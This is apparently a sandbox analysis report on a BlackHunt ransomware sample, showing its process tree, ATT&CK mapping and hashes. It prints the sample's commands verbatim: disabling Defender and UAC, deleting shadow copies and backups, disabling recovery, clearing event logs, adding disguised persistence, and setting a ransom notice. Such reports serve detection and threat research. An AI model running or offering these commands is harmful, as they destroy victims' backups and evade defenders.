ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe 94 PID 1360 wrote to memory of 2476 1360 ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe 94 PID 1360 wrote to memory of 2476 1360 ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe 94 PID 1360 wrote to memory of 2860 1360 ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe 45 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe"C:\Users\Admin\AppData\Local\Temp\ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe"1⤵
- UAC bypass
- Checks whether UAC is enabled
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:1360 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2688 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f3⤵
- Modifies registry class
PID:2676
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2852 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f3⤵
- Modifies registry class
PID:2596
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2756 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵
- Adds Run key to start application
PID:2608
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵PID:3064
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:2052
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵PID:2908
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:632
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵PID:2560
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f3⤵PID:796
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵PID:2572
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f3⤵PID:2800
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵PID:2476
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵PID:2860
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f3⤵PID:2076
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵PID:2544
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f3⤵PID:1812
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵PID:2636
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f3⤵PID:2152
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:2916
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵PID:2336
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:1628
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:1948
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:1376
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:2256
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:768
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:876
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:1880
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:828
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:2740
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:2920
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f4⤵PID:1332
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:588
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:2268
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe" /F2⤵PID:560
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe" /F3⤵
- Creates scheduled task(s)
PID:1700
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:2792
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:2236
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:2952
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:2120
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:2304
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:2188
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:2356
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
- Modifies registry class
PID:2872
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:2328
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:2888
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:844
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:2976
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:2656
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:1696
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:2380
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:1884
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:2384
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:1980
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:2064
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1036
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:2348
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:2612
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:2032
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:2376
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:2312
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:2140
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:2920
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:2876
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵PID:2616
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2988
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:1508
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\2⤵PID:484
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D F:\3⤵
- Enumerates connected drives
PID:4052
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\2⤵PID:1952
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D C:\3⤵PID:588
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\2⤵PID:1668
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D M:\3⤵
- Enumerates connected drives
PID:532
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup2⤵PID:2060
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Setup3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:2164
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System2⤵PID:2852
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:2624
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application2⤵PID:1156
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Application3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:2532
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security2⤵PID:1508
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:836
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false2⤵PID:3156
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security /e:false3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:1568
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:2872
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:2188
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:2440
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:2504
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:2352
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:2944
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:2284
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:2108
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:2408
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:2496
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:3200
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:1552
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f2⤵PID:2104
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f3⤵PID:1280
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f2⤵PID:604
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f3⤵PID:2336
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F2⤵PID:3036
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Delete /TN "Windows Critical Update" /F3⤵PID:1808
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f2⤵PID:2456
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f3⤵PID:2900
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f2⤵PID:1868
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f3⤵PID:1660
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f2⤵PID:1940
-
C:\Windows\system32\taskkill.exetaskkill /IM mshta.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3092
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt2⤵PID:2936
-
C:\Windows\system32\notepad.exenotepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt3⤵PID:1804
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta2⤵PID:3016
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta"3⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:3276
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe"2⤵PID:1556
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:3316
-
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f1⤵PID:2872
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f1⤵PID:1524
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f1⤵PID:2408
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f1⤵PID:744
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f1⤵PID:2540
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f1⤵PID:2476
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵PID:1944
-
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB1⤵
- Interacts with shadow copies
PID:2040
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2836
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f1⤵PID:2404
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2208
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f1⤵PID:1732
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f1⤵
- Modifies registry class
PID:2276
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:1544
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵PID:2068
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
4File Deletion
3Modify Registry
5Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD54b17f2a66300768b19d6fb28666232ae
SHA13d40155141bb713115f69a9057ed5e20317e0ac2
SHA256caf8d04a386c30c70bfb1842b44a02b977fa70e9352a5cf376c13e13eef1aa8f
SHA51229db3f24fb4444bc11534817ac71986327170b1183229bd6b0a78d0d4222bba7175c977a338b90f0af2a25807737ebe5e8b9408417e2a557e60b11100b3159f4
-
Filesize
12KB
MD5ce523654763a04a5a64f4d6cf3518de9
SHA1998c2de6c6469a5808380acaa4ee9517ea46e26f
SHA256dc79d52851f264e10a5b23c2985bc11e2a6323625aa1395ca09ffb82032459b9
SHA5121f22f5d5b2fb14eae92ca01da4b3179231633dedcd55d5f80781d75c5e93a02eeabb58e5ea9898de8d0015c5fd199968fc6f4a0a9796a94be51efeb82ba60cc1
-
Filesize
684B
MD5c1eb6c3842d7b14403e0476900449691
SHA11c9d58f40cbd3781ea5b26896291a8c2def15bf6
SHA25690083a432f001c99421481e55f9d37494163c11fa5b6ac39c7150a35603daced
SHA512493f6b14da897d3c2930b0065e658f404208a43c7aae9aafac06a978fa3107367e458733835d0e509a5e8c3a16f6570cbe3476bd444aa39199e06a8fd6cd75e3